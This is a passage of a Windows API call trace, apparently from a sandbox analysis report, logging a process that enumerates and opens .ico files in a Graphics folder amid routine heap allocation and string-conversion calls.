dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.065] AreFileApisANSI () returned 1 [0062.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0062.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 43 [0062.065] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0062.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.065] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0062.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0062.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0062.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0062.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0062.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0062.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0062.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0062.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0062.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0062.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0062.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.066] AreFileApisANSI () returned 1 [0062.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico", lpUsedDefaultChar=0x0) returned 43 [0062.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0062.066] AreFileApisANSI () returned 1 [0062.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0062.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 43 [0062.066] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.067] GetFileType (hFile=0x41c) returned 0x1 [0062.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0062.067] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.067] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.067] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.068] CloseHandle (hObject=0x41c) returned 1 [0062.069] AreFileApisANSI () returned 1 [0062.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67660 [0062.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 43 [0062.069] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.069] GetFileType (hFile=0x41c) returned 0x1 [0062.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0062.069] CloseHandle (hObject=0x41c) returned 1 [0062.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0062.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0062.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0062.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0062.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0062.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0062.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0062.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0062.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0062.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0062.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.070] AreFileApisANSI () returned 1 [0062.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 43 [0062.070] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.070] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0062.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0062.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.071] AreFileApisANSI () returned 1 [0062.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico", lpUsedDefaultChar=0x0) returned 43 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0062.072] AreFileApisANSI () returned 1 [0062.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0062.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 43 [0062.072] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.072] GetFileType (hFile=0x41c) returned 0x1 [0062.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0062.072] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.072] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.072] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.073] CloseHandle (hObject=0x41c) returned 1 [0062.073] AreFileApisANSI () returned 1 [0062.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 43 [0062.073] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.073] GetFileType (hFile=0x41c) returned 0x1 [0062.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.073] CloseHandle (hObject=0x41c) returned 1 [0062.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0062.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0062.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0062.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0062.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.074] HeapFree (in: 